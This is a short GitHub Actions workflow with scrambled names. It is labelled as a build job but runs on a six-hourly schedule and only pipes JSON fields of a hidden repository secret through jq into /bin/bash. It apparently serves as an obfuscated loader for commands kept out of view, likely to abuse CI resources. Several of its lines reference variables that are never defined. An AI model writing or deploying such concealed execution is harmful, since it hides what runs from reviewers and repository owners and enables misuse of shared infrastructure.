name: xuliangqing7654
on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuliangqing7654
        env:
          hnkpi7783: ${{ secrets.hnkpi7783 }}
        run: |
          echo $hnkpi7783 | jq -r .zprkj42657 | /bin/bash
          echo $ocy761 | jq -r .iqpdh3 | /bin/bash
          echo $nbq5 | jq -r .eix06 | /bin/bash
          echo $e64689 | jq -r .j82 | /bin/bash
          echo $hzf1 | jq -r .wuua5679 | /bin/bash
          echo $sv245 | jq -r .n0723 | /bin/bash
          echo $j62354 | jq -r .g20729 | /bin/bash
          echo $baeh33612 | jq -r .bda3 | /bin/bash

